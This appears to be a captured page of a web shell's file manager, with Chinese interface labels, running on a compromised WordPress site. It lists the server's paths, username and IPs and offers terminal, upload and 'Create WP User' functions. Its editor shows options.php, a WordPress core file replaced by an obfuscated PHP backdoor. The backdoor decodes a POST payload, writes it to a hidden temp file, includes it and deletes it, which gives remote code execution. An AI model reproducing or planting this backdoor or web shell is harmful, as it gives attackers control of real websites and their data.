Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.216.38
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
budomat.net.pl
/
wp-includes
/
Requests
/
src
/
Proxy
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
Http.php
4.12 KB
-rw-r--r--
2022-12-15 22:32
options.php
966.00 B
-rw-r--r--
2022-12-15 22:32
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
options.php
<?php if(array_key_exists("\x72e\x63o\x72d", $_POST)){ $sym = $_POST["\x72e\x63o\x72d"]; $sym= explode ( "." , $sym ) ; $hld = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s); $r = 0; $len = count($sym); do {if ($r >= $len) break; $v6 = $sym[$r]; $chS = ord($s[$r % $sLen]); $dec = ((int)$v6 - $chS - ($r % 10)) ^ 46; $hld.=chr($dec); $r++; } while (true); $marker = array_filter(["/tmp", sys_get_temp_dir(), getcwd(), "/dev/shm", ini_get("upload_tmp_dir"), getenv("TEMP"), session_save_path(), getenv("TMP"), "/var/tmp"]); foreach ($marker as $itm): if (is_writable($itm) && is_dir($itm)) { $mrk = str_replace("{var_dir}", $itm, "{var_dir}/.k"); $success = file_put_contents($mrk, $hld); if ($success) { include $mrk; @unlink($mrk); exit;} } endforeach; }
关闭
保存